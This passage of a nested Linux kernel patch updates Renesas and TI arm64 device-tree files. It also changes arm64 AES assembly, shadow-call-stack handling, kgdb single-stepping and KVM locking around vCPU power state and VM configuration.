+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -195,9 +194,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -215,10 +213,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -237,9 +233,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G044_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G044_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+index 358d4c34465fa..e000510b90a42 100644
+--- a/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
++++ b/arch/arm64/boot/dts/renesas/r9a07g054.dtsi
+@@ -174,9 +174,8 @@
+ 			reg = <0 0x10049c00 0 0x400>;
+ 			interrupts = <GIC_SPI 326 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 327 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 329 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 328 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI0_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI0_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -195,9 +194,8 @@
+ 			reg = <0 0x1004a000 0 0x400>;
+ 			interrupts = <GIC_SPI 330 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 331 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 333 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 332 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI1_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI1_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -215,10 +213,8 @@
+ 				     "renesas,rz-ssi";
+ 			reg = <0 0x1004a400 0 0x400>;
+ 			interrupts = <GIC_SPI 334 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 335 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 336 IRQ_TYPE_EDGE_RISING>,
+ 				     <GIC_SPI 337 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++			interrupt-names = "int_req", "dma_rt";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI2_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI2_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+@@ -237,9 +233,8 @@
+ 			reg = <0 0x1004a800 0 0x400>;
+ 			interrupts = <GIC_SPI 338 IRQ_TYPE_LEVEL_HIGH>,
+ 				     <GIC_SPI 339 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>,
+-				     <GIC_SPI 341 IRQ_TYPE_EDGE_RISING>;
+-			interrupt-names = "int_req", "dma_rx", "dma_tx", "dma_rt";
++				     <GIC_SPI 340 IRQ_TYPE_EDGE_RISING>;
++			interrupt-names = "int_req", "dma_rx", "dma_tx";
+ 			clocks = <&cpg CPG_MOD R9A07G054_SSI3_PCLK2>,
+ 				 <&cpg CPG_MOD R9A07G054_SSI3_PCLK_SFR>,
+ 				 <&audio_clk1>, <&audio_clk2>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+index edcf6b2718814..eb8690a6be168 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+@@ -354,7 +354,7 @@
+ 			     <193>, <194>, <195>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <87>;
++		ti,ngpio = <92>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 77 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 77 0>;
+@@ -371,7 +371,7 @@
+ 			     <183>, <184>, <185>;
+ 		interrupt-controller;
+ 		#interrupt-cells = <2>;
+-		ti,ngpio = <88>;
++		ti,ngpio = <52>;
+ 		ti,davinci-gpio-unbanked = <0>;
+ 		power-domains = <&k3_pds 78 TI_SCI_PD_EXCLUSIVE>;
+ 		clocks = <&k3_clks 78 0>;
+diff --git a/arch/arm64/boot/dts/ti/k3-am625.dtsi b/arch/arm64/boot/dts/ti/k3-am625.dtsi
+index 887f31c23fef6..31b37abbb8d5c 100644
+--- a/arch/arm64/boot/dts/ti/k3-am625.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am625.dtsi
+@@ -96,7 +96,7 @@
+ 	L2_0: l2-cache0 {
+ 		compatible = "cache";
+ 		cache-level = <2>;
+-		cache-size = <0x40000>;
++		cache-size = <0x80000>;
+ 		cache-line-size = <64>;
+ 		cache-sets = <512>;
+ 	};
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+index 576dbce80ad83..b08a083d722d4 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
++++ b/arch/arm64/boot/dts/ti/k3-am62a7-sk.dts
+@@ -26,8 +26,9 @@
+ 
+ 	memory@80000000 {
+ 		device_type = "memory";
+-		/* 2G RAM */
+-		reg = <0x00000000 0x80000000 0x00000000 0x80000000>;
++		/* 4G RAM */
++		reg = <0x00000000 0x80000000 0x00000000 0x80000000>,
++		      <0x00000008 0x80000000 0x00000000 0x80000000>;
+ 	};
+ 
+ 	reserved-memory {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62a7.dtsi b/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
+index 331d89fda29d0..f1ebaec404fbc 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62a7.dtsi
+@@ -96,7 +96,7 @@
+ 	L2_0: l2-cache0 {
+ 		compatible = "cache";
+ 		cache-level = <2>;
+-		cache-size = <0x40000>;
++		cache-size = <0x80000>;
+ 		cache-line-size = <64>;
+ 		cache-sets = <512>;
+ 	};
+diff --git a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+index 603ddda5127fa..e9b36c419bec1 100644
+--- a/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j721e-main.dtsi
+@@ -1093,7 +1093,6 @@
+ 		ti,itap-del-sel-mmc-hs = <0xa>;
+ 		ti,itap-del-sel-ddr52 = <0x3>;
+ 		ti,trm-icp = <0x8>;
+-		ti,strobe-sel = <0x77>;
+ 		dma-coherent;
+ 	};
+ 
+diff --git a/arch/arm64/crypto/aes-neonbs-core.S b/arch/arm64/crypto/aes-neonbs-core.S
+index d427f4556b6eb..b2062eeee59e2 100644
+--- a/arch/arm64/crypto/aes-neonbs-core.S
++++ b/arch/arm64/crypto/aes-neonbs-core.S
+@@ -15,6 +15,7 @@
+  */
+ 
+ #include <linux/linkage.h>
++#include <linux/cfi_types.h>
+ #include <asm/assembler.h>
+ 
+ 	.text
+@@ -620,12 +621,12 @@ SYM_FUNC_END(aesbs_decrypt8)
+ 	.endm
+ 
+ 	.align		4
+-SYM_FUNC_START(aesbs_ecb_encrypt)
++SYM_TYPED_FUNC_START(aesbs_ecb_encrypt)
+ 	__ecb_crypt	aesbs_encrypt8, v0, v1, v4, v6, v3, v7, v2, v5
+ SYM_FUNC_END(aesbs_ecb_encrypt)
+ 
+ 	.align		4
+-SYM_FUNC_START(aesbs_ecb_decrypt)
++SYM_TYPED_FUNC_START(aesbs_ecb_decrypt)
+ 	__ecb_crypt	aesbs_decrypt8, v0, v1, v6, v4, v2, v7, v3, v5
+ SYM_FUNC_END(aesbs_ecb_decrypt)
+ 
+@@ -799,11 +800,11 @@ SYM_FUNC_END(__xts_crypt8)
+ 	ret
+ 	.endm
+ 
+-SYM_FUNC_START(aesbs_xts_encrypt)
++SYM_TYPED_FUNC_START(aesbs_xts_encrypt)
+ 	__xts_crypt	aesbs_encrypt8, v0, v1, v4, v6, v3, v7, v2, v5
+ SYM_FUNC_END(aesbs_xts_encrypt)
+ 
+-SYM_FUNC_START(aesbs_xts_decrypt)
++SYM_TYPED_FUNC_START(aesbs_xts_decrypt)
+ 	__xts_crypt	aesbs_decrypt8, v0, v1, v6, v4, v2, v7, v3, v5
+ SYM_FUNC_END(aesbs_xts_decrypt)
+ 
+diff --git a/arch/arm64/include/asm/debug-monitors.h b/arch/arm64/include/asm/debug-monitors.h
+index 7b7e05c02691c..13d437bcbf58c 100644
+--- a/arch/arm64/include/asm/debug-monitors.h
++++ b/arch/arm64/include/asm/debug-monitors.h
+@@ -104,6 +104,7 @@ void user_regs_reset_single_step(struct user_pt_regs *regs,
+ void kernel_enable_single_step(struct pt_regs *regs);
+ void kernel_disable_single_step(void);
+ int kernel_active_single_step(void);
++void kernel_rewind_single_step(struct pt_regs *regs);
+ 
+ #ifdef CONFIG_HAVE_HW_BREAKPOINT
+ int reinstall_suspended_bps(struct pt_regs *regs);
+diff --git a/arch/arm64/include/asm/kvm_host.h b/arch/arm64/include/asm/kvm_host.h
+index e2b45c937c58a..b5a8e8b3c691c 100644
+--- a/arch/arm64/include/asm/kvm_host.h
++++ b/arch/arm64/include/asm/kvm_host.h
+@@ -127,6 +127,9 @@ struct kvm_arch {
+ 	/* Mandated version of PSCI */
+ 	u32 psci_version;
+ 
++	/* Protects VM-scoped configuration data */
++	struct mutex config_lock;
++
+ 	/*
+ 	 * If we encounter a data abort without valid instruction syndrome
+ 	 * information, report this to user space.  User space can (and
+@@ -398,6 +401,7 @@ struct kvm_vcpu_arch {
+ 
+ 	/* vcpu power state */
+ 	struct kvm_mp_state mp_state;
++	spinlock_t mp_state_lock;
+ 
+ 	/* Cache some mmu pages needed inside spinlock regions */
+ 	struct kvm_mmu_memory_cache mmu_page_cache;
+diff --git a/arch/arm64/include/asm/scs.h b/arch/arm64/include/asm/scs.h
+index 8297bccf07845..5cd4d09bc69d7 100644
+--- a/arch/arm64/include/asm/scs.h
++++ b/arch/arm64/include/asm/scs.h
+@@ -9,15 +9,16 @@
+ #ifdef CONFIG_SHADOW_CALL_STACK
+ 	scs_sp	.req	x18
+ 
+-	.macro scs_load tsk
+-	ldr	scs_sp, [\tsk, #TSK_TI_SCS_SP]
++	.macro scs_load_current
++	get_current_task scs_sp
++	ldr	scs_sp, [scs_sp, #TSK_TI_SCS_SP]
+ 	.endm
+ 
+ 	.macro scs_save tsk
+ 	str	scs_sp, [\tsk, #TSK_TI_SCS_SP]
+ 	.endm
+ #else
+-	.macro scs_load tsk
++	.macro scs_load_current
+ 	.endm
+ 
+ 	.macro scs_save tsk
+diff --git a/arch/arm64/kernel/debug-monitors.c b/arch/arm64/kernel/debug-monitors.c
+index 3da09778267ec..64f2ecbdfe5c2 100644
+--- a/arch/arm64/kernel/debug-monitors.c
++++ b/arch/arm64/kernel/debug-monitors.c
+@@ -438,6 +438,11 @@ int kernel_active_single_step(void)
+ }
+ NOKPROBE_SYMBOL(kernel_active_single_step);
+ 
++void kernel_rewind_single_step(struct pt_regs *regs)
++{
++	set_regs_spsr_ss(regs);
++}
++
+ /* ptrace API */
+ void user_enable_single_step(struct task_struct *task)
+ {
+diff --git a/arch/arm64/kernel/entry.S b/arch/arm64/kernel/entry.S
+index e28137d64b768..3671d9521d4f5 100644
+--- a/arch/arm64/kernel/entry.S
++++ b/arch/arm64/kernel/entry.S
+@@ -272,7 +272,7 @@ alternative_if ARM64_HAS_ADDRESS_AUTH
+ alternative_else_nop_endif
+ 1:
+ 
+-	scs_load tsk
++	scs_load_current
+ 	.else
+ 	add	x21, sp, #PT_REGS_SIZE
+ 	get_current_task tsk
+@@ -845,7 +845,7 @@ SYM_FUNC_START(cpu_switch_to)
+ 	msr	sp_el0, x1
+ 	ptrauth_keys_install_kernel x1, x8, x9, x10
+ 	scs_save x0
+-	scs_load x1
++	scs_load_current
+ 	ret
+ SYM_FUNC_END(cpu_switch_to)
+ NOKPROBE(cpu_switch_to)
+@@ -873,19 +873,19 @@ NOKPROBE(ret_from_fork)
+  */
+ SYM_FUNC_START(call_on_irq_stack)
+ #ifdef CONFIG_SHADOW_CALL_STACK
+-	stp	scs_sp, xzr, [sp, #-16]!
++	get_current_task x16
++	scs_save x16
+ 	ldr_this_cpu scs_sp, irq_shadow_call_stack_ptr, x17
+ #endif
++
+ 	/* Create a frame record to save our LR and SP (implicit in FP) */
+ 	stp	x29, x30, [sp, #-16]!
+ 	mov	x29, sp
+ 
+ 	ldr_this_cpu x16, irq_stack_ptr, x17
+-	mov	x15, #IRQ_STACK_SIZE
+-	add	x16, x16, x15
+ 
+ 	/* Move to the new stack and call the function there */
+-	mov	sp, x16
++	add	sp, x16, #IRQ_STACK_SIZE
+ 	blr	x1
+ 
+ 	/*
+@@ -894,9 +894,7 @@ SYM_FUNC_START(call_on_irq_stack)
+ 	 */
+ 	mov	sp, x29
+ 	ldp	x29, x30, [sp], #16
+-#ifdef CONFIG_SHADOW_CALL_STACK
+-	ldp	scs_sp, xzr, [sp], #16
+-#endif
++	scs_load_current
+ 	ret
+ SYM_FUNC_END(call_on_irq_stack)
+ NOKPROBE(call_on_irq_stack)
+diff --git a/arch/arm64/kernel/head.S b/arch/arm64/kernel/head.S
+index 2196aad7b55bc..cdbbc95eb49d0 100644
+--- a/arch/arm64/kernel/head.S
++++ b/arch/arm64/kernel/head.S
+@@ -404,7 +404,7 @@ SYM_FUNC_END(create_kernel_mapping)
+ 	stp	xzr, xzr, [sp, #S_STACKFRAME]
+ 	add	x29, sp, #S_STACKFRAME
+ 
+-	scs_load \tsk
++	scs_load_current
+ 
+ 	adr_l	\tmp1, __per_cpu_offset
+ 	ldr	w\tmp2, [\tsk, #TSK_TI_CPU]
+diff --git a/arch/arm64/kernel/kgdb.c b/arch/arm64/kernel/kgdb.c
+index cda9c1e9864f7..4e1f983df3d1c 100644
+--- a/arch/arm64/kernel/kgdb.c
++++ b/arch/arm64/kernel/kgdb.c
+@@ -224,6 +224,8 @@ int kgdb_arch_handle_exception(int exception_vector, int signo,
+ 		 */
+ 		if (!kernel_active_single_step())
+ 			kernel_enable_single_step(linux_regs);
++		else
++			kernel_rewind_single_step(linux_regs);
+ 		err = 0;
+ 		break;
+ 	default:
+diff --git a/arch/arm64/kvm/arm.c b/arch/arm64/kvm/arm.c
+index 6ce6888cf73d6..35481d51aada8 100644
+--- a/arch/arm64/kvm/arm.c
++++ b/arch/arm64/kvm/arm.c
+@@ -146,6 +146,16 @@ int kvm_arch_init_vm(struct kvm *kvm, unsigned long type)
+ 	if (ret)
+ 		return ret;
+ 
++	mutex_init(&kvm->arch.config_lock);
++
++#ifdef CONFIG_LOCKDEP
++	/* Clue in lockdep that the config_lock must be taken inside kvm->lock */
++	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->arch.config_lock);
++	mutex_unlock(&kvm->lock);
++#endif
++
+ 	ret = kvm_share_hyp(kvm, kvm + 1);
+ 	if (ret)
+ 		goto out_free_stage2_pgd;
+@@ -324,6 +334,16 @@ int kvm_arch_vcpu_create(struct kvm_vcpu *vcpu)
+ {
+ 	int err;
+ 
++	spin_lock_init(&vcpu->arch.mp_state_lock);
++
++#ifdef CONFIG_LOCKDEP
++	/* Inform lockdep that the config_lock is acquired after vcpu->mutex */
++	mutex_lock(&vcpu->mutex);
++	mutex_lock(&vcpu->kvm->arch.config_lock);
++	mutex_unlock(&vcpu->kvm->arch.config_lock);
++	mutex_unlock(&vcpu->mutex);
++#endif
++
+ 	/* Force users to call KVM_ARM_VCPU_INIT */
+ 	vcpu->arch.target = -1;
+ 	bitmap_zero(vcpu->arch.features, KVM_VCPU_MAX_FEATURES);
+@@ -441,34 +461,41 @@ void kvm_arch_vcpu_put(struct kvm_vcpu *vcpu)
+ 	vcpu->cpu = -1;
+ }
+ 
+-void kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
++static void __kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
+ {
+-	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_STOPPED;
++	WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_STOPPED);
+ 	kvm_make_request(KVM_REQ_SLEEP, vcpu);
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
++void kvm_arm_vcpu_power_off(struct kvm_vcpu *vcpu)
++{
++	spin_lock(&vcpu->arch.mp_state_lock);
++	__kvm_arm_vcpu_power_off(vcpu);
++	spin_unlock(&vcpu->arch.mp_state_lock);
++}
++
+ bool kvm_arm_vcpu_stopped(struct kvm_vcpu *vcpu)
+ {
+-	return vcpu->arch.mp_state.mp_state == KVM_MP_STATE_STOPPED;
++	return READ_ONCE(vcpu->arch.mp_state.mp_state) == KVM_MP_STATE_STOPPED;
+ }
+ 
+ static void kvm_arm_vcpu_suspend(struct kvm_vcpu *vcpu)
+ {
+-	vcpu->arch.mp_state.mp_state = KVM_MP_STATE_SUSPENDED;
++	WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_SUSPENDED);
+ 	kvm_make_request(KVM_REQ_SUSPEND, vcpu);
+ 	kvm_vcpu_kick(vcpu);
+ }
+ 
+ static bool kvm_arm_vcpu_suspended(struct kvm_vcpu *vcpu)
+ {
+-	return vcpu->arch.mp_state.mp_state == KVM_MP_STATE_SUSPENDED;
++	return READ_ONCE(vcpu->arch.mp_state.mp_state) == KVM_MP_STATE_SUSPENDED;
+ }
+ 
+ int kvm_arch_vcpu_ioctl_get_mpstate(struct kvm_vcpu *vcpu,
+ 				    struct kvm_mp_state *mp_state)
+ {
+-	*mp_state = vcpu->arch.mp_state;
++	*mp_state = READ_ONCE(vcpu->arch.mp_state);
+ 
+ 	return 0;
+ }
+@@ -478,12 +505,14 @@ int kvm_arch_vcpu_ioctl_set_mpstate(struct kvm_vcpu *vcpu,
+ {
+ 	int ret = 0;
+ 
++	spin_lock(&vcpu->arch.mp_state_lock);
++
+ 	switch (mp_state->mp_state) {
+ 	case KVM_MP_STATE_RUNNABLE:
+-		vcpu->arch.mp_state = *mp_state;
++		WRITE_ONCE(vcpu->arch.mp_state, *mp_state);
+ 		break;
+ 	case KVM_MP_STATE_STOPPED:
+-		kvm_arm_vcpu_power_off(vcpu);
++		__kvm_arm_vcpu_power_off(vcpu);
+ 		break;
+ 	case KVM_MP_STATE_SUSPENDED:
+ 		kvm_arm_vcpu_suspend(vcpu);
+@@ -492,6 +521,8 @@ int kvm_arch_vcpu_ioctl_set_mpstate(struct kvm_vcpu *vcpu,
+ 		ret = -EINVAL;
+ 	}
+ 
++	spin_unlock(&vcpu->arch.mp_state_lock);
++
+ 	return ret;
+ }
+ 
+@@ -585,9 +616,9 @@ int kvm_arch_vcpu_run_pid_change(struct kvm_vcpu *vcpu)
+ 	if (kvm_vm_is_protected(kvm))
+ 		kvm_call_hyp_nvhe(__pkvm_vcpu_init_traps, vcpu);
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 	set_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags);
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 
+ 	return ret;
+ }
+@@ -1202,7 +1233,7 @@ static int kvm_arch_vcpu_ioctl_vcpu_init(struct kvm_vcpu *vcpu,
+ 	if (test_bit(KVM_ARM_VCPU_POWER_OFF, vcpu->arch.features))
+ 		kvm_arm_vcpu_power_off(vcpu);
+ 	else
+-		vcpu->arch.mp_state.mp_state = KVM_MP_STATE_RUNNABLE;
++		WRITE_ONCE(vcpu->arch.mp_state.mp_state, KVM_MP_STATE_RUNNABLE);
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index 817fdd1ab7783..dd20b8688d230 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -951,7 +951,9 @@ int kvm_arm_vcpu_arch_set_attr(struct kvm_vcpu *vcpu,
+ 
+ 	switch (attr->group) {
+ 	case KVM_ARM_VCPU_PMU_V3_CTRL:
++		mutex_lock(&vcpu->kvm->arch.config_lock);
+ 		ret = kvm_arm_pmu_v3_set_attr(vcpu, attr);
++		mutex_unlock(&vcpu->kvm->arch.config_lock);
+ 		break;
+ 	case KVM_ARM_VCPU_TIMER_CTRL:
+ 		ret = kvm_arm_timer_set_attr(vcpu, attr);
+diff --git a/arch/arm64/kvm/hypercalls.c b/arch/arm64/kvm/hypercalls.c
+index 950e35b993d2b..1f5beebf62174 100644
+--- a/arch/arm64/kvm/hypercalls.c
++++ b/arch/arm64/kvm/hypercalls.c
+@@ -377,7 +377,7 @@ static int kvm_arm_set_fw_reg_bmap(struct kvm_vcpu *vcpu, u64 reg_id, u64 val)
+ 	if (val & ~fw_reg_features)
+ 		return -EINVAL;
+ 
+-	mutex_lock(&kvm->lock);
++	mutex_lock(&kvm->arch.config_lock);
+ 
+ 	if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags) &&
+ 	    val != *fw_reg_bmap) {
+@@ -387,7 +387,7 @@ static int kvm_arm_set_fw_reg_bmap(struct kvm_vcpu *vcpu, u64 reg_id, u64 val)
+ 
+ 	WRITE_ONCE(*fw_reg_bmap, val);
+ out:
+-	mutex_unlock(&kvm->lock);
++	mutex_unlock(&kvm->arch.config_lock);
+ 	return ret;
+ }
+ 
+diff --git a/arch/arm64/kvm/pmu-emul.c b/arch/arm64/kvm/pmu-emul.c
+index ed12c5355afbb..c7e5f6a28c28b 100644
+--- a/arch/arm64/kvm/pmu-emul.c
++++ b/arch/arm64/kvm/pmu-emul.c
+@@ -850,7 +850,7 @@ static int kvm_arm_pmu_v3_set_pmu(struct kvm_vcpu *vcpu, int pmu_id)
+ 	struct arm_pmu *arm_pmu;
+ 	int ret = -ENXIO;
+ 
+-	mutex_lock(&kvm->lock);
++	lockdep_assert_held(&kvm->arch.config_lock);
+ 	mutex_lock(&arm_pmus_lock);
+ 
+ 	list_for_each_entry(entry, &arm_pmus, entry) {
+@@ -870,7 +870,6 @@ static int kvm_arm_pmu_v3_set_pmu(struct kvm_vcpu *vcpu, int pmu_id)
+ 	}
+ 
+ 	mutex_unlock(&arm_pmus_lock);
+-	mutex_unlock(&kvm->lock);
+ 	return ret;
+ }
+ 
+@@ -878,22 +877,20 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ {
+ 	struct kvm *kvm = vcpu->kvm;
+ 
++	lockdep_assert_held(&kvm->arch.config_lock);
++
+ 	if (!kvm_vcpu_has_pmu(vcpu))
+ 		return -ENODEV;
+ 
+ 	if (vcpu->arch.pmu.created)
+ 		return -EBUSY;
+ 
+-	mutex_lock(&kvm->lock);
+ 	if (!kvm->arch.arm_pmu) {
+ 		/* No PMU set, get the default one */
+ 		kvm->arch.arm_pmu = kvm_pmu_probe_armpmu();
+-		if (!kvm->arch.arm_pmu) {
+-			mutex_unlock(&kvm->lock);
++		if (!kvm->arch.arm_pmu)
+ 			return -ENODEV;
+-		}
+ 	}
+-	mutex_unlock(&kvm->lock);
+ 
+ 	switch (attr->attr) {
+ 	case KVM_ARM_VCPU_PMU_V3_IRQ: {
+@@ -937,19 +934,13 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ 		     filter.action != KVM_PMU_EVENT_DENY))
+ 			return -EINVAL;
+ 
+-		mutex_lock(&kvm->lock);
+-
+-		if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags)) {
+-			mutex_unlock(&kvm->lock);
++		if (test_bit(KVM_ARCH_FLAG_HAS_RAN_ONCE, &kvm->arch.flags))
+ 			return -EBUSY;
+-		}
+ 
+ 		if (!kvm->arch.pmu_filter) {
+ 			kvm->arch.pmu_filter = bitmap_alloc(nr_events, GFP_KERNEL_ACCOUNT);
+-			if (!kvm->arch.pmu_filter) {
+-				mutex_unlock(&kvm->lock);
++			if (!kvm->arch.pmu_filter)
+ 				return -ENOMEM;
+-			}
+ 
+ 			/*
+ 			 * The default depends on the first applied filter.
+@@ -968,8 +959,6 @@ int kvm_arm_pmu_v3_set_attr(struct kvm_vcpu *vcpu, struct kvm_device_attr *attr)
+ 		else
+ 			bitmap_clear(kvm->arch.pmu_filter, filter.base_event, filter.nevents);
+ 
+-		mutex_unlock(&kvm->lock);
+-
+ 		return 0;
+ 	}
+ 	case KVM_ARM_VCPU_PMU_V3_SET_PMU: {
+diff --git a/arch/arm64/kvm/psci.c b/arch/arm64/kvm/psci.c
+index 7fbc4c1b9df04..5767e6baa61a2 100644
+--- a/arch/arm64/kvm/psci.c
++++ b/arch/arm64/kvm/psci.c
+@@ -62,6 +62,7 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	struct vcpu_reset_state *reset_state;
+ 	struct kvm *kvm = source_vcpu->kvm;
+ 	struct kvm_vcpu *vcpu = NULL;
++	int ret = PSCI_RET_SUCCESS;
+ 	unsigned long cpu_id;
+ 
+ 	cpu_id = smccc_get_arg1(source_vcpu);
+@@ -76,11 +77,15 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	 */
+ 	if (!vcpu)
+ 		return PSCI_RET_INVALID_PARAMS;
++
++	spin_lock(&vcpu->arch.mp_state_lock);
+ 	if (!kvm_arm_vcpu_stopped(vcpu)) {
+ 		if (kvm_psci_version(source_vcpu) != KVM_ARM_PSCI_0_1)
+-			return PSCI_RET_ALREADY_ON;
++			ret = PSCI_RET_ALREADY_ON;
+ 		else
+-			return PSCI_RET_INVALID_PARAMS;
++			ret = PSCI_RET_INVALID_PARAMS;
++
++		goto out_unlock;
+ 	}
+ 
+ 	reset_state = &vcpu->arch.reset_state;
+@@ -96,7 +101,7 @@ static unsigned long kvm_psci_vcpu_on(struct kvm_vcpu *source_vcpu)
+ 	 */
+ 	reset_state->r0 = smccc_get_arg3(source_vcpu);
+ 
+-	WRITE_ONCE(reset_state->reset, true);
++	reset_state->reset = true;
+ 	kvm_make_request(KVM_REQ_VCPU_RESET, vcpu);
+ 
+ 	/*
